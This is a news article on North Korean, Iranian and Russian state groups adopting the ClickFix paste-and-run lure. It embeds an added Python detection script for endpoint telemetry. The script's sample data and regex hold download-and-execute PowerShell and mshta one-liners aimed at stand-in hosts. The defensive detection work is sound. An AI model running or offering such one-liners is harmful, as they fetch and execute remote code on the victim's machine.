State-sponsored cyber groups are flocking to the 'ClickFix' social engineering technique
ClickFix is being used to target think tanks, government, and defense firms
State-sponsored hackers from North Korea, Iran, and Russia are exploiting the ‘ClickFix’ social engineering technique for the first time – and to great success.
Popular for some time with cyber crime groups, ClickFix is a social engineering practice that uses dialog boxes with instructions to copy, paste, and run malicious commands on the target’s machine.
The technique was first seen in early March last year, employed by initial access broker TA571 and the ClearFake cluster - but it soon spread far more widely.
According to researchers at Proofpoint, over a three-month period from the end of last year through the beginning of 2025, North Korea's TA427, Iran's TA450, and Russia's UNK_RemoteRogue and TA422 have all been making use of it.
"This creative technique not only employs fake error messages as the problem, but also an authoritative alert and instructions supposedly coming from the operating system as a solution," said Proofpoint.
Rather than revolutionizing their campaigns, the technique is replacing the installation and execution stages in existing infection chains. While it's currently limited to a few state-sponsored groups, Proofpoint said it expects the attack method to become more widely tested or adopted by threat actors.
North Korea's TA427 was first spotted using ClickFix at the beginning of this year, Proofpoint noted. The group targeted individuals in a handful of think tanks, masquerading as a Japanese diplomat and offering a meeting with the Japanese ambassador to the US, Shigeo Yamada.
Iran's TA450, meanwhile, used an attacker-controlled email address - support@microsoftonlines[.]com - to send an English-language phish to targets at more than 39 organizations in the Middle East.
They deployed the ClickFix technique by persuading the target to first open PowerShell with administrator privileges, then copy a command from the email body and paste it into the console. Running it installed remote monitoring and management (RMM) software, giving the group an interactive foothold to conduct espionage and exfiltrate data from the target's machine.
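The infection path described above leaves a characteristic trace on the endpoint: an interactive host (the Win+R Run dialog launched from explorer.exe, a browser, or a terminal) spawns a shell whose command line carries a download-and-execute cradle, sometimes elevated. The following triage script is an added example and is not code from Proofpoint or ITPro. It runs over constructed records modelled on Sysmon Event ID 1 fields (ParentImage, Image, CommandLine, IntegrityLevel) and on constructed HKCU\...\Explorer\RunMRU values; the field names, the example.invalid hostnames and the indicator lists are assumptions, not artifacts from the campaigns in the article.

```python
"""Heuristic ClickFix triage over constructed endpoint telemetry (added example)."""
import base64
import re
from pathlib import PureWindowsPath

# Processes a victim pastes into: the Run dialog is a child of explorer.exe,
# a browser may launch a protocol handler, a terminal is itself the child.
PASTE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "windowsterminal.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe", "curl.exe"}

# Download-and-execute cradle fragments typical of pasted one-liners (assumed list).
CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-expression|\biex\b|downloadstring|"
    r"mshta\s+https?://|-w(?:indowstyle)?\s+hidden|\bcurl\b.*\|\s*(?:cmd|powershell)",
    re.IGNORECASE,
)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()


def decode_encoded_command(cmdline):
    """Return the UTF-16LE payload behind -e/-ec/-enc/-EncodedCommand, or '' if none."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.IGNORECASE)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def clickfix_indicators(ev):
    """Return {indicator: detail} for one process-creation event."""
    hits = {}
    parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
    if parent in PASTE_PARENTS and child in SHELL_CHILDREN:
        hits["paste_path"] = f"{parent} -> {child}"
    decoded = decode_encoded_command(ev["CommandLine"])
    if decoded:
        hits["encoded"] = decoded          # inspect what the operator actually ran
    m = CRADLE.search(ev["CommandLine"] + " " + decoded)
    if m:
        hits["cradle"] = m.group(0)
    if ev.get("IntegrityLevel") == "High":
        hits["elevated"] = "High integrity"  # matches the 'run PowerShell as administrator' lure
    return hits


def is_clickfix(ev):
    """Paste path plus a cradle is the minimal signature; elevation only raises severity."""
    hits = clickfix_indicators(ev)
    return "paste_path" in hits and "cradle" in hits


def runmru_suspects(values):
    """RunMRU stores each Run-dialog entry with a trailing '\\1'; return entries with cradle fragments."""
    out = []
    for name, data in values.items():
        if name == "MRUList":
            continue
        entry = data[:-2] if data.endswith("\\1") else data
        if CRADLE.search(entry):
            out.append(entry)
    return out


# Constructed sample data (not real telemetry).
ENC = base64.b64encode("iex (iwr http://example.invalid/a.ps1)".encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "IntegrityLevel": "High",
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/fix.ps1 | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "IntegrityLevel": "Medium",
     "CommandLine": "powershell -nop -enc " + ENC},
    {"ParentImage": r"C:\Windows\System32\services.exe", "Image": PS, "IntegrityLevel": "System",
     "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},   # scheduled admin script, benign
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt", "IntegrityLevel": "Medium"},
]
RUNMRU = {"a": "mshta https://example.invalid/verify\\1", "b": "calc\\1", "MRUList": "ba"}

if __name__ == "__main__":
    for ev in EVENTS:
        print(is_clickfix(ev), clickfix_indicators(ev))
    print(runmru_suspects(RUNMRU))
```

The decisive signal is the combination, not any single field: administrators legitimately run PowerShell from a terminal, and scheduled scripts legitimately use download cradles, but a shell born from explorer.exe or a browser that immediately fetches and evaluates remote code is what a user pasting a "fix" produces. Decoding -EncodedCommand before matching matters because the visible command line is otherwise just a base64 blob; the RunMRU check gives the same answer retrospectively on a host whose process logs have already rolled over.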
ClickFix abuse expected to surge
UNK_RemoteRogue used ClickFix only once, researchers said. Notably, none of the groups named above showed repeated use of the technique during that three-month window.
The security firm first hypothesized that this might be because it represented a trial period, or that the groups found the technique less successful than others for machine compromise.
With TA427 returning to ClickFix with a slightly varied infection chain in April, researchers now believe that the group is developing how it uses the ClickFix technique in its operations, and that more sightings are likely in the coming months.
One noteworthy finding from the Proofpoint research is that Chinese state-sponsored groups haven’t jumped on the bandwagon as of yet. This, researchers said, could change in the coming months.
"Given the technique’s trajectory around the world, there is a conspicuous absence in the use of ClickFix by a Chinese state-sponsored actor in Proofpoint investigations," said the firm.
"However, this is likely due to visibility, and there is a high probability that a China-nexus group has also experimented with ClickFix, given its appearance across many actors’ campaigns in a short period of time."
Emma Woollacott is a freelance journalist writing for publications including the BBC, Private Eye, Forbes, Raconteur and specialist technology titles.
